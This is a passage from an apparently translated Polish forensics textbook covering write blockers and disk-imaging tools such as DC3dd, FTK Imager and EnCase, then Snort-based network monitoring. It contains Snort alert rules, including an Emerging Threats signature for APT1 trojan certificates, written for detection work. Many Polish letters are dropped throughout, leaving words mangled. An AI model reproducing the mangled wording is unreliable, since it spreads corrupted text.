rdem danych jest system uniksowy, dyski z macierzy RAID albo cokolwiek nietypowego,
wolimy prawdziwe obrazy ledcze, np. takie jakie tworz programy DC3dd i FTK Imager.
Jeli konieczne jest wykonanie zaawansowanych czynnoci, obraz musi by wiern
reprezentacj oryginau, a konwersja jest tylko strat czasu.
TRADYCYJNE METODY DUPLIKACJI

Opisalimy trzy typy obrazw: kompletne obrazy dyskw, obrazy partycji oraz obrazy logiczne.
Specjalista z zespou RI najczciej tworzy jeden z nich w sposb tradycyjny lub w dziaajcym
systemie. W podrozdziale tym opisujemy tradycyjne metody tworzenia obrazw i wykorzystywane
w nich narzdzia. Techniki te polegaj na pracy ze statycznymi napdami (tzn. dyskami twardymi
niepodczonymi do dziaajcego systemu operacyjnego). System zosta wyczony i uruchomiony
w specjalnym rodowisku do tworzenia obrazw dyskw lub dyski zostay podczone do programu
do tworzenia obrazw albo analitycznej stacji roboczej. Niezalenie od tego, czy dysk znajduje si
w wyczonej macierzy RAID, czy zosta zakopany przy drodze, podstaw tradycyjnej metody
wykonywania duplikatu jest to, e jest odczony od zasilania.
Sprztowe blokady zapisu

Najlepszym sposobem na uniemoliwienie jakiejkolwiek modyfikacji nonika rdowego jest
uycie specjalnego urzdzenia blokujcego wysyanie polece zapisu do kontrolera napdu.
Kady zesp RI powinien mie pod rk przynajmniej kilka takich urzdze.
Typowa blokada zapisu to mostek protokoowy zawierajcy zmodyfikowane oprogramowanie
ukadowe lub specjalny ukad elektroniczny do przechwytywania niektrych polece danego
protokou. Na rysunku 8.2 pokazano cztery takie urzdzenia. Majc taki sprzt, mona bez
problemu wykonywa duplikaty urzdze SATA, PATA, SCSI, SAS oraz USB. Urzdzenia
widoczne na rysunku 8.2 s wyprodukowane przez firm Tableau.
RYSUNEK 8.2. Urzdzenia do blokowania moliwoci zapisu danych na dyskach twardych

W INTERNECIE
Strona internetowa firmy www.tableau.com
Firma WiebeTech produkuje narzdzia umoliwiajce tworzenie obrazw dyskw SATA i PATA
poprzez zcza USB, Firewire i eSATA. Niektrzy nasi konsultanci zabieraj te urzdzenia ze sob,
poniewa s dobrze skonstruowane, atwo mieszcz si w nieduych walizkach i umoliwiaj szybkie
duplikowanie napdw przez zcze eSATA. Na rysunku 8.3 mona zobaczy urzdzenie Forensic
UltraDock v4 firmy WiebeTech podczone do dysku twardego.
RYSUNEK 8.3. Urzdzenie do blokowania zapisu podczane do zcza eSATA
W INTERNECIE
Strona internetowa firmy WiebeTech wiebetech.com
Przedstawione przez nas dwa typy blokad to aktualnie najlepsze urzdzenia na rynku. Obie
firmy s bardzo aktywne w brany i przeprowadzaj wyczerpujce testy pozwalajce zapewni
niezawodno dziaania ich urzdze. Jak pisalimy wczeniej, najwiesze informacje o blokadach
zapisu mona znale na stronach NIST CFTT.
Narzdzia do tworzenia obrazw

Duplikaty na potrzeby ledztwa najczciej tworzy si za pomoc specjalnych programw.
Trzy najwaniejsze aplikacje z tej dziedziny to DC3dd, FTK Imager firmy Access Data oraz EnCase
firmy Guidance Software. Kada z nich ma pewne zalety i wady, ktre sprawiaj, e w niektrych
sytuacjach sprawdza si lepiej, a w innych gorzej. Naley zna kilka narzdzi, aby w razie problemw
z jednym mie jakie wyjcie awaryjne. Dalej opisujemy kade z trzech wymienionych narzdzi.
Rozpoczynajc tworzenie duplikatu, naley przemyle kilka spraw.
Czy nonik rdowy ma ochron przed zapisem?
Czy moje rodowisko analityczne moe wykonywa jakiekolwiek czynnoci automatycznie?
Jest to wane, gdy z jakiego powodu nie da si zapewni sprztowej blokady zapisu.
Czy mam wystarczajco duo miejsca na zapisanie otrzymanych plikw?
Jak podcz si do nonika rdowego?
Jakich opcji wiersza polece naley uy, aby uzyska spodziewane wyniki?
Kady opis zaczynamy od takich samych warunkw pocztkowych. Mamy podejrzany dysk
twardy, ktry trzeba zduplikowa. Podczylimy go do swojej stacji roboczej za pomoc blokady
zapisu i mamy wolumin gotowy do przyjcia pliku obrazu. Jak napisalimy wczeniej, proces ten
nazywa si wykonywaniem obrazu dysku statycznego.
Ostrzeenie Tworzc obraz dysku statycznego lub korzystajc z jakichkolwiek dowodw, zawsze naley uywa
blokady zapisu, aby zabezpieczy si przed przypadkow modyfikacj danych. Nie myl, e Twj
system operacyjny jest dobrze wychowany i nie dokona adnych zmian w materiale dowodowym,
jeli mu nie kaesz. W rzeczywistoci zamontowanie dysku tylko w celu odczytu z niego danych
moe spowodowa aktualizacj struktur partycjonowania, odtworzenie dziennikw albo
napraw drobnych niespjnoci. Zawsze lepiej si zabezpieczy na wszelki wypadek.
Narzdzia dd, DCFLdd i DC3dd

Polecenie dd jest dostpne w prawie kadym systemie uniksowym. Wedug instrukcji obsugi
systemu Unix polecenie to suy do konwertowania i kopiowania plikw. Jako e wikszo
systemw uniksowych prezentuje dyski twarde i inny sprzt jako pliki, za pomoc polecenia dd
mona wykonywa duplikaty na potrzeby ledztwa. Naley jednak mie wiadomo, e poleceniu
temu brakuje pewnych przydatnych funkcji. Dwa najpowaniejsze braki, istotne z naszego punktu
widzenia, to brak moliwoci wygenerowania i zapisania kryptograficznej sumy kontrolnej oraz
brak jakichkolwiek informacji o dziaaniu, dopki nie wystpi bd krytyczny. Dlatego cho
za pomoc polecenia dd mona wykona obraz, lepiej posuy si nowszym opartym na nim
narzdziem, takim jak DCFLdd lub DC3dd.
Narzdzia DCFLdd i DC3dd to specjalne aplikacje zbudowane na bazie kodu rdowego

narzdzia dd. Powstay one w laboratoriach DCFL (U.S. Department of Defense Computer
Forensics Laboratory) i DC3 (Defense Cyber Crime Center). Ich kod jest aktualnie przechowywany
w portalu Sourceforge. Dodano do nich funkcje, dziki ktrym doskonale nadaj si do tworzenia
duplikatw na potrzeby ledztw. W czasie pisania tej ksiki DC3dd byo aktualniejsze i miao
nowsze funkcje.
W INTERNECIE
Strona narzdzia DCFLdd w portalu Sourceforge sourceforge.net/projects/dcfldd
Strona narzdzia DC3dd w portalu Sourceforge sourceforge.net/projects/dc3dd
Przyjrzymy si procesowi tworzenia duplikatu ledczego za pomoc narzdzia DC3dd

na podstawie typowego przykadu polegajcego na utworzeniu statycznego obrazu napdu
podczonego do naszej stacji roboczej przez fizyczn blokad zapisu.
Konieczne bdzie uruchomienie programu DC3dd. Do wyboru s dwie moliwoci: uycie
dysku rozruchowego z zainstalowanym programem lub skopiowanie skompilowanego pliku
aplikacji na swoj stacj robocz z systemem Linux. Oczywicie najatwiej znale dysk rozruchowy
z zainstalowanym programem DC3dd. Dostpnych jest kilka rozwiza, np. Kali Linux albo
Ultimate Boot CD.
Jeli zdecydujesz si na wykorzystanie stacji roboczej, a nie rodowiska rozruchowego z pyty CD,
to w wikszoci dystrybucji Linuksa binarny pakiet DC3dd jest dostpny poprzez menedera
pakietw. Przykadowo w systemie Ubuntu wystarczy zainstalowa za pomoc polecenia apt-get
pakiet dc3dd. Jeli jednak dla dystrybucji, ktrej uywasz, nie ma znanego pakietu DC3dd, np.
korzystasz z systemu Microsoft Windows, musisz pobra i skompilowa program samodzielnie.
Przeledzimy teraz proces wykonywania duplikatu dysku za pomoc narzdzia DC3dd.
Polecenia, ktrych uyjemy, s takie same w kadym systemie uniksowym i na kadej platformie
zgodnej ze standardem POSIX. Inne bd tylko cieki. Proces opisany dalej zosta przeprowadzony
na analitycznej stacji roboczej z systemem Ubuntu 12.04.
Jak napisalimy wczeniej, w przykadach pobieramy dowody przez poczenie ze rdem
danych z moliwoci tylko odczytu, a do zapisywania otrzymanych plikw uywamy urzdzenia
/mnt/storage. Zamontowalimy w nim ju wolumin o rozmiarze wystarczajcym do zapisania
obrazu. Pocztkujcy mog mie problemy ze znalezieniem podczonego napdu rdowego.
W Linuksie najatwiej przyjrze si wynikom polecenia dmesg. Jeli ostatnio podczye do komputera
urzdzenie, ktrego obraz chcesz wykona, informacje o nim znajd si na dole danych zwrconych
przez polecenie dmesg. Przykad takiego wyniku pokazano na rysunku 8.4.
W tym przypadku jdro wykryo dysk flash USB o pojemnoci 1 GB i przypisao mu urzdzenie sdb.
W Linuksie wszystkie urzdzenia dyskowe s adresowane w katalogu /dev, wic pena nazwa tego
nowego fizycznego nonika to /dev/sdb. Teraz wykonamy polecenie DC3dd, przekazujc mu na wejciu
to urzdzenie oraz okrelajc katalog wyjciowy, algorytm obliczania skrtw i plik dziennika.
Jeli chcesz dowiedzie si, jakich innych opcji mona uywa, wykonaj polecenie ./dc3dd -help.
sudo dc3dd if=/dev/sdb of=/mnt/sdb.dd hash=md5 hlog=/mnt/sdb.log
RYSUNEK 8.4. Wynik polecenia dmesg
W tym przykadzie obraz zapisalimy w pojedynczym pliku /mnt/sdb.dd, ale jeli trzeba,
mona podzieli ten obraz na kilka plikw za pomoc opcji ofs= i ofsz= . I tak opcja
ofs=/mnt/sdb.0000 ofsz=500M spowoduje utworzenie plikw o maksymalnym rozmiarze 500 MB,
o numerowanych nazwach zaczynajcych si od sdb.0000. Dziennik sesji zgodnie z ustawieniem
opcji hlog= zostaby zapisany w pliku /mnt/sdb.log. Natomiast opcja hash= oznacza, e ma zosta
obliczona suma kontrolna MD5.
Standardowo narzdzie DC3dd sprawdza rozmiar urzdzenia i wywietla na bieco procent
postpu wykonywania operacji. Dodatkowo program ten pokazuje, ile danych wczyta oraz
ile czasu mino od rozpoczcia procesu. Na rysunku 8.5 pokazano przykad dziaania
programu DC3dd.
Automatyczne montowanie urzdze
Wiele dystrybucji systemu Linux i wersji systemu Apple OS X dla komputerw stacjonarnych
prbuje automatycznie montowa podczone do komputera noniki. Jeli wic nie korzystasz
z mostka uniemoliwiajcego zapis, musisz wyczy demona odpowiedzialnego za t
automatyczn funkcj. W internecie mona znale wiele poradnikw, jak to zrobi w rnych
dystrybucjach i wersjach systemu OS X. Oglnie rzecz biorc, polega to na zakoczeniu lub
wyczeniu demona monitorujcego zmiany sprztowe. W najnowszych wersjach systemu
OS X demon ten nazywa si diskarbitrationd.
RYSUNEK 8.5. Dziaanie programu DC3dd
Oddanie kontroli nad wierszem polece przez program DC3dd oznacza, e obraz jest gotowy.
Nastpnie moesz skompletowa dokumentacj, posugujc si obliczon przez narzdzie sum
kontroln, i zabezpieczy dowody.
Program AccessData FTK Imager

Program FTK Imager firmy AccessData to darmowe i wszechstronne narzdzie do wykonywania
obrazw dyskw. Wystpuje w wersjach dla systemw Microsoft Windows, Linux (Debian i Fedora)
oraz Mac OS od 10.5 do 10.8. Wersja dla systemu Windows ma graficzny interfejs uytkownika
i dostpna jest w dwch odmianach Lite i penej. Gwna rnica midzy nimi polega na tym,
e wersja Lite jest przenona, tzn. moe dziaa samodzielnie bezporednio z napdu USB. Ponadto
program FTK Imager w kadym systemie operacyjnym mona uruchomi w wierszu polece.
Program FTK Imager tworzy obrazy w czterech formatach: surowym (dd), EnCase (E01/EFW),
SMART oraz AFF. Ponadto umoliwia dzielenie obrazw na kawaki, co jest przydatne, gdy uywany
system plikw lub kopii zapasowych ma jakie ograniczenia dotyczce rozmiaru plikw. Oprcz
tego narzdzie ma wiele innych przydatnych funkcji, takich jak przegldarka obrazw, moliwo
wypakowywania plikw, funkcja konwersji obrazw, funkcja montowania obrazu jako litery dysku itd.
Szczegowe informacje mona znale w dokumentacji.
W INTERNECIE
AccessData www.accessdata.com/
EnCase firmy Guidance Software

Firma Guidance Software udostpnia trzy narzdzia do tworzenia obrazw na potrzeby ledztw.
W systemach Microsoft Windows mona skorzysta z produktu EnCase Forensic oraz dwch
narzdzi wiersza polece, winen.exe i winacq.exe. W systemach linuksowych do dyspozycji mamy
dyski rozruchowe Guidance Software uruchamiajce LinEN (linuksowe narzdzie do tworzenia
obrazw). Aby skorzysta z tych narzdzi, naley posiada kopi programu EnCase. Zawieraj one
opcje ustawiania poziomu kompresji i rozmiaru plikw czciowych. Format obrazu to E01
programu EnCase.
W INTERNECIE
Informacje o produktach EnCase firmy Guidance Software www.guidancesoftware.com/forensic.
DUPLIKOWANIE DZIAAJCEGO SYSTEMU

Duplikowanie dziaajcego systemu to czynno polegajca na utworzeniu obrazu nonika
znajdujcego si w systemie, ktry jest uruchomiony. Nie jest to najlepsze rozwizanie, ale czasami
nie ma innego wyjcia. Przykadowo system moe mie kluczowe znaczenie dla dziaalnoci firmy
i nie mona go wyczy, chyba e na bardzo krtki czas w celu przeprowadzenia szybkich prac
serwisowych. Czasami dyski s szyfrowane i ich zawarto po wyczeniu systemu staje si
niemoliwa do odczytania. Wykonywanie obrazu powoduje drobne zmiany w dziaajcym
systemie, ale przynajmniej zdobdziemy jaki obraz. Pamitaj, aby dokadnie opisa wszystkie
swoje czynnoci i uyte narzdzia, zastosowane procedury, uruchomione usugi, daty i godziny itd.
Informacje te bd potrzebne, gdy kto podway Twoje dowody stwierdzeniem, e system zosta
zmodyfikowany. Zarzuty takie atwiej obali, gdy ma si waciw dokumentacj.
Ostrzeenie Wykonywanie duplikatu dziaajcego systemu jest znacznie bardziej ryzykowne ni wykonywanie
obrazu statycznego. Podczas pracy dysk nie jest chroniony przed zapisem przez adne urzdzenie.
Ponadto dziaania s prowadzone na systemie uywanym w produkcji. Pamitaj, e zawsze
istnieje ryzyko znacznego obcienia systemu, a nawet wywoania jego awarii.
Inn potencjaln wad wykonywania obrazu dziaajcego systemu jest to, e nonik rdowy si
zmienia. Podczas tworzenia duplikatu zawarto nonika cay czas si zmienia. Ponadto w buforze
systemu operacyjnego mog znajdowa si pewne nieprzeniesione jeszcze na dysk dane. Brak
spjnoci odczytu informacji z dysku moe doprowadzi do tego, e duplikat bdzie czciowo
lub cakowicie bezuyteczny.
Podczas tworzenia obrazu dziaajcego systemu naley przedsiwzi specjalne rodki
ostronoci. Brak ochrony przed zapisem sprawia, e mona przez pomyk zapisa obraz na dysku
rdowym i zniszczy w ten sposb dowody. Ponadto naley starannie dobra oprogramowanie
i prawidowo si nim posuy. Nie powinno si niczego kopiowa ani instalowa na dysku rdowym
uywaj narzdzi uruchamianych bezporednio z nonika zewntrznego lub udziau sieciowego.

Ponadto powinno si uywa lekkich programw, aby zminimalizowa ich wpyw na system
rdowy. W naszej firmie do wykonywania obrazw dziaajcych systemw czsto wykorzystujemy
program FTK Imager Lite. Procedura postpowania wyglda prawie tak samo jak w przypadku
wykonywania obrazu statycznego. S tylko dwie rnice. Oto one.
Program do wykonywania obrazu uruchamia si bezporednio z przenonego nonika lub
udziau sieciowego. Ponadto ogranicza si ilo zmian w dziaajcym systemie operacyjnym,
a wic unika si kopiowania i instalowania programw.
Naley wybra zasoby odpowiadajce napdom dyskw twardych nalecych do dziaajcego
systemu. Przejrzyj list wszystkich zasobw i odpowiednio wykonaj obraz kadego napdu
nalecego do systemu.
DUPLIKOWANIE RODKW FIRMOWYCH

Czasami materiay dowodowe potrzebne w ledztwie znajduj si w bardzo duych centralnych
systemach przechowywania danych RAID, SAN, NAS lub innych. W wielu takich przypadkach
nie ma moliwoci wykonania kompletnego duplikatu rda, poniewa uniemoliwia to po prostu
jego rozmiar lub poziom zoonoci konfiguracji. Zdarza si te tak, e cho istnieje moliwo
wykonania duplikatu, jest to niepodane. W podrozdziale tym omawiamy niektre czynniki,
jakie naley wzi pod uwag przy podejmowaniu decyzji dotyczcych sposobu zabezpieczania
dowodw w tego typu sytuacjach.
Duplikacja sprztu firmy Apple
Sprzt firmy Apple jest z reguy bardziej zintegrowany ni inne rodzaje komputerw. Komputery
z serii MacBook Air byy pierwszymi laptopami, w ktrych w 2010 roku uyto dyskw flash
ze zczem mSATA. W starszych wersjach wykorzystywano zcze tamowe ZIF. Jedne
i drugie mog sprawia trudnoci zespoom RI i grupom dochodzeniowym. W pierwszych
komputerach PowerBook z 1999 roku firma Apple wprowadzia obsug trybu dziaania
o nazwie Target Disk Mode. Po zresetowaniu systemu tryb ten wcza stan konfiguracyjny
sprawiajcy, e komputer zamienia si w drogi dysk zewntrzny. W trybie tym system mona
podczy do zcza FireWire (lub ThunderBold) innego komputera, aby korzysta z jego
dyskw. W tym momencie podejrzany komputer mona traktowa jak kady inny mostek
(z prawami odczytu i zapisu) do duplikacji. Aktualnie tylko jedna firma, Tableau LLC, oferuje
mostki FireWire z blokad zapisu.
Prac naley rozpocz od ustalenia, gdzie s przechowywane potrzebne dane, i sporzdzenia

planu utworzenia ich logicznej kopii. Jeeli w Twojej organizacji wykorzystywane s okrelone
narzdzia, np. EnCase albo FTK, kade z nich ma funkcj kopiowania i zapisywania logicznych kopii
plikw w specjalnych kontenerach. W procesie tworzenia takiego kontenera powstaje kontener
zawierajcy oryginalne metadane dotyczce kadego pliku rdowego oraz kryptograficzn sum
kontroln pozwalajc zweryfikowa dane w przyszoci.
Jeli system przechowywania danych jest may lub redniej wielkoci, moe wystarczy czasu
i zasobw na wykonanie jego kompletnej kopii. Pamitaj jednak, e w niektrych systemach
magazynowania wykorzystywane s specjalne metody zapisu danych i obsugi nonikw.
W zwizku z tym pniej moe si nie uda przywrcenie duplikatw do uywalnego stanu. Jeli
wiesz, e okrelone dane s potrzebne, lepszym rozwizaniem moe by zastosowanie metody,
ktra na pewno da dobre wyniki (np. wykonanie obrazu na ywo na zamontowanym woluminie
lub utworzenie logicznej kopii plikw). Jeli nie masz pewnoci, ktre informacje s niezbdne albo
jeste w posiadaniu systemu magazynowania i masz do niego zapewniony dostp, moesz pokusi
si o utworzenie penych fizycznych obrazw i ich odtworzenie. Naturalnie wymagao to bdzie
wyczenia jednostki magazynowej na duszy czas.
Duplikowanie maszyn wirtualnych

Przez dziesi lat, jakie upyny od ukazania si poprzedniego wydania tej ksiki, krajobraz
komputerowy w przedsibiorstwach uleg znacznym zmianom. Jednak lista uywanych technologii
nie zmienia si tak bardzo. Wiele serwerowni i centrw danych zostao cakowicie zwirtualizowanych,
co daje zespoom RI nowe moliwoci dziaania. Specjalici, zamiast stosowa tradycyjne metody
zbierania informacji, mog uzyska od administratora kopi plikw skadajcych si na maszyn
wirtualn. Jeli maszyna ta zostanie wstrzymana, mona dodatkowo utworzy obraz jej pamici
praktycznie bez adnych kosztw. Otrzymujc system w takim formacie, naley zapisa w dokumentacji
rdo jego pochodzenia, skrt kryptograficzny oraz pozostae potrzebne informacje. Jest to bardzo
skuteczny sposb wykonywania obrazw serwerw na potrzeby ledztwa.
Zrzut macierzy RAID czy dyskw? Oto jest pytanie
Jeli mamy peny dostp do macierzy RAID, powstaje pytanie, czy wykona obraz kadego
dysku osobno, czy sprbowa wykona obraz woluminu prezentowanego przez kontroler
RAID. Najczciej uruchamiamy system na zaufanym noniku (np. wasnym obrazie Linuksa)
i wykonujemy obrazy woluminw prezentowanych przez kontroler RAID. Oczywicie naley
wej do ustawie BIOS RAID i sprawdzi w konfiguracji, czy uwzgldniane s wszystkie dane
przechowywane na woluminach fizycznych. To troch uatwia wykonywanie analiz, poniewa
rekonstrukcja macierzy RAID nie zawsze jest atwa.
I CO Z TEGO
W rozdziale tym opisalimy najczciej stosowane metody duplikowania danych na potrzeby
ledztwa. Dostpnych jest kilka komercyjnych i otwartych narzdzi o udowodnionej niezawodnoci
w wykrywaniu i duplikowaniu zawartoci dyskw twardych, nonikw pamici i innych przenonych
urzdze. Technologia cay czas si zmienia i pojawiaj si coraz to nowe metody czenia, ochrony
i duplikowania danych. Zanim uyje si nowego narzdzia lub metody, naley sprawdzi, czy zostay
dobrze przetestowane i czy kto inny ju ich uywa.
W fazie przygotowa przed wystpieniem incydentu naley wytypowa, jakie rodzaje magazynw
mona bdzie napotka w danej organizacji. Trzeba znale narzdzia umoliwiajce wykonanie
duplikatu zawartoci tych nonikw danych oraz powiczy wykonywanie zrzutw na mao wanym
sprzcie. Wiele sklepw sprzedajcych komputerowy sprzt ledczy dziaa bardzo efektywnie i potrafi
dostarczy towar w cigu jednego dnia od zoenia zamwienia, ale dziaanie pod presj jest zym
momentem na nauk obsugi nowego sprztu. Najlepiej wszystko mie gotowe zawczasu i by
przygotowanym prawie na wszystko.
PYTANIA
1. Na rynku pojawia si nowy produkt do duplikowania zawartoci dyskw twardych
i wykonywania obrazw o nazwie Cyber Imager Pro. Twj szef chce przetestowa ten
program, aby oceni jego przydatno w firmie do wykonywania duplikatw danych
na potrzeby ledztw. W jaki sposb ocenisz ten programu i jak stwierdzisz, czy nadaje si
do uytku?
2. Podczye dyski twarde z dowodami do systemu w celu wykonania ich obrazw.
Czy musisz uy blokady zapisu, jeli planujesz rozruch z pyty CS z systemem Linux?
Wyjanij swoj odpowied.
3. Powierzono Ci zadanie wybrania narzdzia do tworzenia obrazw zawartoci dyskw
twardych i opracowania standardowej procedury wykonywania tych obrazw.
Jakie czynniki wemiesz pod uwag i jakie kroki uwzgldnisz w swojej procedurze?
4. Prbujesz wykona obraz zawartoci dysku twardego, ale proces ulega awarii
w przypadkowych miejscach. Program do tworzenia obrazw informuje, e nie moe
odczyta danych ze rdowego dysku twardego. Jak rozwiesz ten problem?
ROZDZIA 9.
Dowody z sieci
G
dy w 2000 roku ukazao si pierwsze wydanie tej ksiki, mao kto uwaa monitorowanie
sieci za wan cz dobrej strategii zabezpieczania informacji. Robiy to tylko organizacje,
w ktrych pracowali wysoko wykwalifikowani specjalici od systemu Unix, ktrzy tak dobrze
optymalizowali infrastruktur, e dziaaa prawie bezobsugowo. Dopiero potem jaki nudzcy si
administrator systemu, nie majc nic innego do roboty, montowa czujniki na kilku portach SPAN
przecznikw. Dzi wszystko to wyglda cakiem inaczej. Nastpiy tak due zmiany, e wiele firm,
ktrych akcjami mona obraca na giedzie, w caoci opiera si na monitorowaniu sieci i danych,
jakie mona dziki temu zdoby.
W tzw. tradycyjnym monitorowaniu sieci rozwizania implementuje si w odpowiedzi
na zapotrzebowanie. Dostpnych jest kilka rozwiza dla przedsibiorstw, ktre mona w razie
potrzeby rozszerza z kilku do setek czujnikw. W czasie ledztwa mona istniejc infrastruktur,
jeli organizacja tak posiada, wykorzysta do monitorowania punktw wyjciowych. Jeli jednak
zesp nie moe dodawa ani modyfikowa sygnatur na czujnikach w rozsdnym czasie albo musi
monitorowa wewntrzn podsie, moe by konieczne wdroenie wasnych czujnikw taktycznych.
Jeeli czonkowie Twojego zespou potrafi tworzy, testowa i interpretowa sygnatury sieciowe,
dane pozyskane z pomoc analizy szkodliwego oprogramowania i innych rde moesz wykorzysta
do wykrywania dodatkowych ladw szkodliwej dziaalnoci.
W rozdziale tym opisujemy sposoby tworzenia czujnikw na potrzeby ledztwa, informujemy,
jakie metody zbierania informacji s najbardziej przydatne zespoom RI, oraz pokazujemy,
jak interpretowa zgromadzone dane.
ARGUMENTY ZA MONITOROWANIEM SIECI

Podczas ledztwa z reguy nie brakuje przydatnych informacji umoliwiajcych podejmowanie
pewnych dziaa. Po co wic dodawa do tego caego baaganu jeszcze monitorowanie punktw
wyjciowych i sieci wewntrznych? Jeli wdroona jest infrastruktura monitorowania, zesp moe
szybko zamieni dane zebrane z dziennikw i w wyniku analizy szkodliwego oprogramowania
w sygnatury pomocne przy:
potwierdzaniu i odrzucaniu podejrze dotyczcych rzekomego incydentu bezpieczestwa;
gromadzeniu dodatkowych dowodw i wskanikw;
weryfikowaniu zakresu incydentu;
identyfikowaniu dodatkowych stron zaangaowanych w spraw;
tworzeniu osi czasu zdarze majcych miejsce w sieci.
W niektrych przypadkach dane przechwycone przez czujnik sieciowy lub urzdzenie s
jedynym dowodem na to, e haker wykona pewne czynnoci. Wemy np. dania POST wysyane
do serwera aplikacji. Jeli nie mamy serwerw proxy albo uywane serwery nie maj skonfigurowanego
moduu mod_security lub podobnego, w dziennikach hosta nie znajdziemy adnych informacji.
W jednym ze scenariuszy opisanych w tym rozdziale przedstawiamy sposb przechwytywania
i dekodowania polece przesyanych do serwera za pomoc polece HTTP POST.
ROZDZIA 9. DOWODY Z SIECI 205
RODZAJE MONITORINGU SIECIOWEGO

Rozpoczynajc monitorowanie sieci w ramach operacji RI, mamy do wyboru cztery poziomy
szczegowoci danych. Pierwszy najbardziej przypomina to, do czego jestemy przyzwyczajeni
w normalnych monitoringach zabezpiecze, czyli alerty dotyczce zdarze. Najczciej do zbierania
tego typu informacji uywane s aplikacje Snort i Suricata. Dostpne s te komercyjne programy
Sourcefire i RSA NetWitness. Jeli wprowadzi si do nich dokadnie przetestowane i dopracowane
zestawy regu, bd generowa zdarzenia (lub alerty), gdy wykryj zdefiniowane zdarzenia
w monitorowanej sieci. Dwa kolejne poziomy szczegowoci dotycz zbierania pakietw
i informacji sesyjnych speniajcych dane kryteria. Zadaniem ledczego jest tylko pniejsze
przetworzenie danych w celu wydobycia z nich potrzebnych informacji. Opcje te polegaj
na rejestrowaniu nagwkw i kompletnych pakietw. I w kocu mona te generowa
wysokopoziomowe statystyki przedstawiajce rodzaj i objto danych przechodzcych przez sieci.
W INTERNECIE
Snort www.snort.org
Suricata www.openinfosecfoundation.org
Sourcefire www.sourcefire.com
RSA NetWitness www.emc.com/security/rsa-netwitness.htm
Jaka metoda przechwytywania danych bdzie najbardziej korzystna dla Twojego zespou?
Najlepiej mie moliwo gromadzenia danych na wszystkich czterech poziomach. Jeli masz
sieciowe wskaniki zagroenia opracowane na podstawie analizy szkodliwego programu, alerty
zdarzeniowe bd dostarcza Ci informacji na bieco, dziki czemu szybko wykryjesz inne
zainfekowane systemy w swojej sieci. Dane nagwkowe i kompletne pakiety mog pomc
w identyfikacji zakresu kradziey danych, wykryciu aktywnoci hakerw posugujcych si
interaktywn konsol oraz cisym monitorowaniu komunikacji midzy szkodliwym
oprogramowaniem a zdalnymi witrynami internetowymi. I w kocu, jeli dysponujesz bardzo
ma iloci informacji o zdarzeniu, to podejrzany ruch i dziwne transfery mog dostarczy
cennych danych o aktywnociach w sieci, ktrych w inny sposb nie daoby si wykry.
Monitorowanie zdarze
Monitorowanie sieci i zgaszanie alertw w chwili wykrycia okrelonych zdarze to jedna z technik
monitorowania najczciej stosowanych przez organizacje. Istnieje wiele darmowych i patnych
programw, za pomoc ktrych monitorowanie nawet caej organizacji jest atwe, przynajmniej
jeli chodzi o samo wdroenie rozwizania. Ten rodzaj monitorowania sieci bazuje na reguach
lub progach. Najprociej mwic, zdarzenia wskazuj, e czujnik wykry co interesujcego.
Tradycyjne zdarzenia s generowane przez systemy detekcji intruzw sieciowych (ang. network
intrusion detection systems NIDS), ale zdarzenia mog by te generowane przez programy
monitorujce wzorce i przepyw ruchu sieciowego.
Standardowe narzdzia do monitoringu zdarzeniowego to Snort i Suricata. Kady z tych

programw ma swoje zalety i moe by przydatny w Twojej organizacji, cho wszystko zaley
od tego, jakie masz wymagania. Zamiast opisywa zalety i wady obu tych rozwiza, ktra to lista
natychmiast staaby si nieaktualna, odsyamy do podanych wczeniej stron internetowych.
W rozdziale tym pokazujemy przykad monitorowania przy uyciu programu Snort.
Monitorowanie zdarzeniowe bazuje na wskanikach (lub sygnaturach), ktre porwnuje si
z ruchem obserwowanym przez czujnik sieciowy. Wskaniki mog by proste, takie jak np.
kombinacja adresw IP i portu TCP (przykadowo zgaszamy alert, gdy komputer w sieci prbuje
poczy si z demonem SSH na serwerze sieciowym). Implementacja prostych regu jest z reguy
mao kosztowna, poniewa tylko w niewielkim stopniu obciaj one czujnik. Jednak wskaniki
mog by bardziej skomplikowane. Do skomplikowanych wskanikw zaliczaj si rekonstrukcje
sesji i mechanizmy dopasowywania acuchw wymagajce utrzymywania stanu poczenia. Jeeli
uyje si zbyt wielu takich wskanikw w czujniku, moe si okaza, e nie bdzie on nada
z przetwarzaniem przechodzcych przez niego danych. Poniej znajduje si przykad prostego
wskanika, ktry podnosi alarm, gdy system prbuje poczy si przez SSH z serwerem sieciowym
pod adresem 192.168.2.78. Wskanik ten informuje o alarmie nie czciej ni raz na minut dla
kadego rdowego adresu IP.
alert tcp $HOME_NET any -> 192.168.2.78 22 (msg:"Prba poczenia przez SSH z serwerem
sieciowym"; threshold: type limit, track by_src, seconds 60, count 1;
classtype:misc-attack; sid:1000001; rev:1;)
W INTERNECIE
Podrcznik uytkownika programu Snort manual.snort.org
Istnieje wiele wtyczek wyjciowych do programu Snort, a wybr opcji w pliku konfiguracyjnym
tego narzdzia w duym stopniu zaley od zaplanowanego sposobu obsugi informacji generowanych
przez czujniki. Dalej w tym rozdziale opisujemy kilka konsoli zarzdzania, ale najprostszy modu
wyjciowy nazywa si alert_fast. Umoliwia on atwe sprawdzenie, czy wybrane zestawy regu
dziaaj prawidowo, przez wysanie tekstu ASCII do pliku za pomoc konsoli czujnika. W tym
przykadzie plik konfiguracyjny programu Snort zawiera acuch output alert_fast alerts.txt.
Pokazany powyej wskanik generuje wpis w module wyjciowym alert_fast co minut dla kadego
rdowego adresu IP. Oto zawarto pliku alerts.txt:
11/24-20:16:41.515991 [**] [1:1000001:1] Attempted SSH connection to web server
[**] [Classification: Misc Attack] [Priority: 2] {TCP}
192.168.2.104:56387 -> 192.168.2.78:22
Wykrywanie pocze SSH z serwerem wewntrznym to bardzo prosty przykad. Mechanizm

analityczny wbudowany w program Snort dopasowuje tylko adresy IP i nagwki TCP oraz moe
odrzuci reszt pakietu, jeli nie znajdzie czciowego (lub potencjalnego) dopasowania do adnych
innych wskanikw. Udostpnione w domenie publicznej reguy Emerging Threats zawieraj wiele
prawdziwych przykadw. Poniej znajduje si wskanik Emerging Threats wykrywajcy uycie
faszywego certyfikatu SSL wykorzystywanego przez hakerw opisanych w raporcie APT1 firmy
Mandiant z 2013 roku:
alert tcp $EXTERNAL_NET 443 -> $HOME_NET any (msg:"ET TROJAN FAKE AOL SSL Cert
APT1"; flow:established,from_server; content:"|7c a2 74 d0 fb c3 d1 54 b3
d1 a3 00 62 e3 7e f6|"; content:"|55 04 03|"; content:"|0c|mail.aol.com";
distance:1; within:13; reference:url,www.mandiant.com/apt1;
classtype:trojan-activity; sid:2016469; rev:3;)
